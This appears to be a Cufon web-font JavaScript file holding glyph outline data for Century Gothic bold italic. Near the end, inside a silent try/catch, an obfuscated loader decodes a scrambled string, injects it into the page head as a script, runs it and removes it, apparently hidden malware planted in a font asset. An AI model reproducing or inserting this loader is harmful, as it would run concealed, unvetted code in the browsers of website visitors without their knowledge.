,-49,29,-85,80,-86v42,-1,78,32,74,73v-7,71,-38,81,-97,148r87,0r-6,44r-160,0r4,-34v64,-67,90,-84,120,-136v12,-22,3,-51,-22,-51"},{"d":"134,-185v14,-21,-4,-41,-30,-41v-23,0,-37,11,-43,33r-46,0v6,-47,41,-75,94,-77v43,-1,74,31,77,69v4,51,-79,67,-80,124r-45,0v-4,-62,44,-79,73,-108xm45,-25v0,-15,14,-29,30,-29v16,0,29,14,29,29v0,15,-14,30,-29,30v-15,1,-30,-15,-30,-30"},{"d":"94,-265r28,0r0,335r-28,0r0,-335","w":216},{"d":"45,-259r47,0r-35,259r-47,0","w":100},{"d":"10,-88v0,-85,111,-146,160,-77r3,-26r47,0r-34,261r-47,0r12,-91v-17,15,-30,25,-58,26v-49,2,-83,-44,-83,-93xm116,-153v-64,-6,-85,116,-12,116v67,6,85,-117,12,-116","w":237},{"d":"185,-193v-2,35,-22,53,-48,72v11,17,22,31,30,41v13,-8,23,-16,32,-23r26,34r-31,24r36,45r-57,0v-6,-6,-13,-13,-18,-20v-20,14,-49,27,-79,27v-33,0,-67,-30,-65,-63v3,-43,27,-57,64,-80v-35,-46,-7,-114,53,-112v31,1,59,23,57,55xm124,-204v-23,2,-24,28,-11,46v18,-12,27,-23,27,-33v0,-7,-7,-14,-16,-13xm57,-57v5,36,54,12,71,2v-9,-11,-21,-29,-30,-42v-14,10,-39,17,-41,40","w":244},{"d":"169,-35v-31,64,-156,47,-149,-33v3,-36,10,-86,14,-123r47,0r-15,122v-2,29,43,40,59,19v21,-27,20,-98,28,-141r46,0v-9,51,-12,117,-30,156","w":216},{"d":"38,-265r46,0r-35,265r-47,0","w":86},{"d":"44,-259r50,0r36,80r57,-80r56,0r-91,128r59,131r-50,0r-39,-88r-63,88r-56,0r97,-136","w":244},{"d":"43,-265r46,0r-18,140r75,-66r65,0r-97,85r84,106r-56,0r-75,-94r-13,94r-46,0","w":208},{"d":"10,-191r46,0r30,106r61,-106r51,0r-111,191r-23,0"},{"d":"217,-103v0,85,-112,147,-159,76r-13,97r-47,0r35,-261r46,0r-3,20v18,-16,30,-25,59,-25v49,-2,82,45,82,93xm111,-38v65,6,86,-116,13,-117v-67,-6,-86,116,-13,117","w":237},{"d":"66,-259r44,0r44,181r89,-181r42,0r3,259r-45,0r-2,-155r-77,155r-37,0r-39,-162r-41,162r-47,0","w":323},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"57,-82v-2,48,65,57,94,26r42,21v-41,64,-182,50,-182,-50v0,-59,48,-112,107,-111v63,2,102,48,92,114r-153,0xm163,-116v-6,-33,-48,-46,-78,-27v-9,6,-16,16,-21,27r99,0","w":230},{"d":"10,-88v0,-85,111,-146,160,-77r13,-100r47,0r-35,265r-46,0r2,-21v-17,15,-30,25,-58,26v-49,2,-83,-44,-83,-93xm116,-153v-64,-6,-85,116,-12,116v67,6,85,-117,12,-116","w":237},{"d":"56,-265r76,0r-6,45r-28,0r-34,245r28,0r-6,45r-77,0","w":115},{"d":"32,-240v0,-15,13,-29,29,-29v16,0,29,13,29,29v0,16,-14,29,-29,29v-15,0,-29,-14,-29,-29xm31,-191r47,0r-23,169v-5,70,-25,111,-89,90r5,-42v30,14,33,-10,37,-42","w":93},{"d":"110,-220v-15,0,-25,10,-27,24r-44,0v4,-41,34,-68,76,-69v41,0,67,28,67,65v0,28,-19,49,-40,61v71,39,22,146,-54,146v-45,0,-80,-37,-78,-86r46,0v1,26,13,40,36,41v23,1,38,-22,38,-44v0,-26,-18,-38,-48,-38r6,-41v26,1,45,-13,45,-36v0,-14,-9,-23,-23,-23"},{"d":"47,-259r42,0r94,176r24,-176r47,0r-35,259r-41,0r-95,-178r-24,178r-47,0","w":266},{"d":"87,-259r41,0r69,195r-43,0r-46,-132r-46,132r-43,0","w":216},{"d":"14,-112v0,-84,67,-153,152,-153v70,0,125,52,123,121v-3,87,-62,150,-153,151v-72,1,-122,-48,-122,-119xm240,-141v0,-47,-31,-78,-76,-78v-61,0,-99,46,-101,104v-2,43,29,76,75,76v54,0,102,-48,102,-102","w":302},{"d":"13,-90v1,-88,25,-175,105,-175v48,0,71,46,70,103v-2,85,-30,169,-107,169v-49,0,-68,-42,-68,-97xm86,-37v52,-8,66,-115,48,-170v-5,-8,-12,-12,-21,-12v-44,0,-52,77,-54,129v-1,33,4,50,27,53"},{"d":"27,-167v0,-16,13,-29,29,-29v16,0,30,14,30,29v0,15,-15,30,-30,30v-15,0,-29,-14,-29,-30xm26,-47r36,22r-48,63r-23,-14","w":100},{"d":"140,-105v4,-28,4,-48,-23,-48v-62,0,-49,93,-62,153r-47,0r26,-191r47,0r-3,19v37,-41,112,-28,112,31v0,45,-12,97,-17,141r-47,0","w":216},{"d":"72,-259r77,0r-35,259r-47,0r28,-213r-38,0"},{"d":"27,-117r95,0r-5,43r-95,0","w":151},{"d":"27,-117r95,0r-5,43r-95,0","w":151},{"d":"10,-88v0,-85,111,-146,160,-77r3,-26r47,0r-25,191r-46,0r2,-21v-17,15,-30,25,-58,26v-49,2,-83,-44,-83,-93xm116,-153v-64,-6,-85,116,-12,116v67,6,85,-117,12,-116","w":237},{"d":"140,-105v4,-28,4,-48,-23,-48v-62,0,-49,93,-62,153r-47,0r36,-265r47,0r-13,93v37,-41,112,-28,112,31v0,45,-12,97,-17,141r-47,0","w":216},{"d":"7,-25v0,-16,13,-29,29,-29v16,0,30,14,30,29v0,15,-15,30,-30,30v-15,0,-29,-14,-29,-30","w":100},{"d":"91,-38v43,4,55,-84,10,-87v-11,0,-19,6,-26,16r-44,-12r40,-138r124,0r-6,45r-84,0r-14,50v47,-21,88,17,88,68v0,76,-74,129,-139,89v-14,-9,-25,-23,-34,-41r42,-20v12,18,21,28,43,30"},{"d":"26,-47r36,22r-48,63r-23,-14","w":100},{"d":"142,-104v12,-37,-19,-61,-48,-41v-35,24,-28,95,-39,145r-47,0r25,-191r47,0r-3,20v30,-35,98,-34,111,10v15,-19,38,-34,68,-35v41,0,60,35,54,82r-15,114r-47,0r16,-125v-3,-46,-60,-23,-69,4v-9,26,-15,85,-20,121r-47,0","w":338},{"d":"42,-259r161,0r-3,32r-130,234r-40,-22r112,-199r-106,0"},{"d":"94,7v-70,0,-100,-84,-63,-142v30,-47,58,-86,88,-130r37,25r-62,87v48,-14,88,28,88,74v0,49,-39,86,-88,86xm135,-78v0,-20,-16,-36,-37,-36v-21,0,-41,18,-40,39v0,20,17,37,38,37v21,1,39,-19,39,-40"},{"w":100},{"d":"46,-265r48,0r-26,189r-49,0xm8,-25v0,-15,14,-29,30,-29v16,0,29,14,29,29v0,15,-14,30,-29,30v-15,1,-30,-15,-30,-30","w":100},{"d":"124,-176r-27,0r-10,-89r47,0xm52,-176r-28,0r-9,-89r47,0","w":129},{"d":"195,-119r0,35r-40,0r-13,84r-35,0r12,-84r-34,0r-12,84r-35,0r12,-84r-39,0r0,-35r45,0r5,-33r-39,0r0,-35r44,0r11,-78r35,0r-11,78r33,0r12,-78r35,0r-11,78r35,0r0,35r-40,0r-5,33r35,0xm129,-152r-34,0r-4,33r33,0","w":216},{"d":"59,75v-59,-107,-21,-274,49,-345r61,0v-89,78,-124,242,-49,345r-61,0","w":136},{"d":"8,-191r46,0r37,113r66,-113r50,0r-150,261r-50,0r55,-96","w":208},{"d":"43,-259r128,0r-6,46r-79,0r-7,54r79,0r-6,45r-79,0r-15,114r-49,0","w":172},{"d":"47,-259r49,0r-12,88r84,-88r60,0r-113,119r89,140r-54,0r-73,-115r-16,115r-48,0","w":223},{"d":"140,-265r43,0r-23,173r26,0r-6,42r-25,0r-7,50r-44,0r6,-50r-109,0r6,-42xm127,-183r-69,91r57,0"},{"d":"11,-89v0,-82,106,-144,159,-80r3,-22r47,0r-21,153v11,119,-140,143,-194,71r41,-21v34,37,108,17,105,-35v-52,50,-140,12,-140,-66xm105,-43v67,0,84,-109,12,-109v-33,0,-60,28,-60,62v0,28,20,47,48,47","w":237},{"d":"48,-259r48,0r-29,215r80,0r-5,44r-129,0","w":158},{"d":"33,-198v0,-36,31,-67,69,-67v31,0,56,14,77,42r-36,32v-15,-19,-27,-28,-40,-28v-12,0,-24,8,-22,18v8,44,81,73,81,134v0,43,-36,74,-79,74v-35,0,-64,-18,-86,-51r38,-30v15,23,31,35,48,35v15,0,32,-12,30,-28v-6,-48,-82,-76,-80,-131","w":187},{"d":"23,-259r45,0r14,168r80,-168r36,0r31,164r57,-164r47,0r-91,259r-40,0r-32,-171r-81,171r-43,0","w":323},{"d":"8,46r116,-312r34,0r-116,312r-34,0","w":165},{"d":"152,-136v62,38,37,136,-50,136r-90,0r35,-259v74,-4,135,5,135,69v0,24,-13,44,-30,54xm82,-156v39,6,61,-16,48,-47v-10,-10,-17,-11,-41,-11xm67,-46v45,9,91,-12,65,-51v-11,-17,-23,-14,-56,-15","w":208},{"d":"70,-270v59,107,21,273,-48,345r-61,0v88,-78,124,-244,48,-345r61,0","w":136},{"d":"86,-151r0,-66r44,0r0,66r66,0r0,44r-66,0r0,66r-44,0r0,-66r-66,0r0,-44r66,0","w":216},{"d":"15,-120v-3,-105,129,-188,224,-121v11,8,22,18,32,31r-41,26v-20,-23,-35,-35,-71,-36v-52,-3,-95,48,-95,100v0,62,70,103,125,69v14,-8,25,-20,34,-36r-81,0r6,-46r131,0v-3,81,-56,139,-136,140v-73,1,-126,-54,-128,-127","w":302},{"d":"43,-259r141,0r-6,46r-92,0r-7,54r92,0r-6,45r-92,0r-9,69r92,0r-6,45r-141,0","w":187},{"d":"15,-119v-4,-124,164,-194,253,-106r-35,33v-51,-60,-168,-13,-168,71v0,77,101,107,156,59r29,37v-29,21,-63,32,-102,32v-81,0,-130,-50,-133,-126","w":280},{"d":"183,-36v-29,69,-168,53,-161,-34v5,-60,17,-130,24,-189r48,0r-24,190v-2,39,63,39,72,9v16,-55,20,-137,30,-199r49,0v-12,70,-15,169,-38,223","w":230},{"d":"30,-70v11,18,31,40,51,24v17,-62,20,-145,32,-213r49,0v-13,74,-15,170,-37,234v-12,34,-66,41,-99,18v-14,-10,-25,-22,-34,-39","w":172},{"d":"44,-262r47,0r-10,71r29,0r-5,40r-30,0r-20,151r-47,0r20,-151r-23,0r6,-40r23,0","w":107},{"d":"196,-64r0,44r-176,-90r0,-39r176,-89r0,44r-125,65","w":216},{"d":"186,-201v-1,31,-20,51,-47,62v24,9,41,30,41,61v0,52,-38,83,-92,85v-44,1,-82,-34,-81,-75v1,-40,24,-64,56,-76v-56,-33,-20,-121,50,-121v39,0,74,28,73,64xm107,-164v33,0,43,-56,5,-56v-17,0,-30,14,-30,30v0,15,10,26,25,26xm133,-81v0,-21,-15,-38,-35,-38v-25,-1,-43,22,-43,46v0,19,17,35,37,35v24,0,41,-20,41,-43"},{"d":"63,-176r-28,0r-9,-89r46,0","w":79},{"d":"68,-265r44,0r-13,53r39,-38r21,39r-54,14r54,15r-23,38r-39,-38r14,53r-43,0r13,-53r-39,38r-23,-38r54,-15r-54,-15r23,-39r39,39","w":158},{"d":"135,-259r41,0r65,259r-47,0r-14,-55r-102,0r-30,55r-52,0xm168,-101r-21,-85r-45,85r66,0","w":266},{"d":"238,-135v0,84,-49,139,-145,135r-81,0r35,-259v117,-8,191,23,191,124xm188,-134v0,-57,-35,-82,-98,-79r-23,168v80,5,121,-20,121,-89","w":252},{"d":"30,-191v0,-64,37,-96,90,-68r-5,39v-22,-18,-38,-8,-38,29r29,0r-5,40r-29,0r-21,151r-47,0r21,-151r-20,0r5,-40r20,0","w":100},{"d":"27,-167v0,-16,13,-29,29,-29v16,0,30,14,30,29v0,15,-15,30,-30,30v-15,0,-29,-14,-29,-30xm7,-25v0,-16,13,-29,29,-29v16,0,30,14,30,29v0,15,-15,30,-30,30v-15,0,-29,-14,-29,-30","w":100},{"d":"11,-84v0,-61,51,-113,109,-112v55,1,90,38,91,94v1,59,-51,108,-111,107v-53,-1,-89,-35,-89,-89xm103,-39v68,8,86,-114,14,-113v-64,-6,-87,112,-14,113","w":230},{"d":"31,-134v-6,99,127,148,189,81r34,0v-28,37,-54,58,-110,58v-80,0,-138,-57,-138,-138v0,-80,57,-135,138,-138v65,-2,125,52,125,113v0,59,-39,98,-90,104v-13,1,-21,-5,-21,-18v-35,38,-102,6,-96,-48v-9,-63,79,-115,118,-61r3,-19r35,0r-19,115v0,3,2,6,6,6v24,-6,40,-37,40,-69v0,-62,-42,-97,-102,-97v-67,0,-108,45,-112,111xm141,-165v-39,-3,-52,72,-7,73v38,2,50,-72,7,-73","w":266}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+318-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("^esG4t*AmBE1^P>MWt$VzezEpo*GstE1po|VmB9as[J=I}Av&GX&h}d@S>AEB>sU[$|Eh:U>I$XGuwlDue|M:e>9WndVS$LV#nX|&:sG4$D8Wal*po[LBo;}Q>d#u$XGuwunsB_XK[XGuwlDse$;K@O=4Q&ozP$&zvu;SOsK*eWuOGW&KAzZ^AW$UG[^WwN_|VZl9eI,4AgvKa*N4e>A^Pzv^:XZ#Qg=&wGvKag=4wGNKtX>4tWAmPXa#Bz1svda4`>Nm`uESnAMmBI;IglPw-$e`z|^Ku*h#U9:QO[BpIsm4&WSyYDv@L>ta;ZH8=C1fNXV}AGon_d,MJETxvdfm}AfpvYxhaWnWGN1^QJ;#}Zf4a9Z4B[}sp|omB*>&`|f&GN1IoEC^:Ufm:dAsp*A^eXfIo$AmBE1KtDf&n91IBG>^:>t4nz;hoLJ4w=8^oLZsGC@Bo>WpQGNBo>Wy:L;^:gY")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":201,"face":{"font-family":"Century Gothic","font-weight":700,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 2 2 9 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-39 -295 333 79.0989","underline-thickness":"32.3438","underline-position":"-16.875","slope":"-7.59999","unicode-range":"U+0020-U+007E"}}));


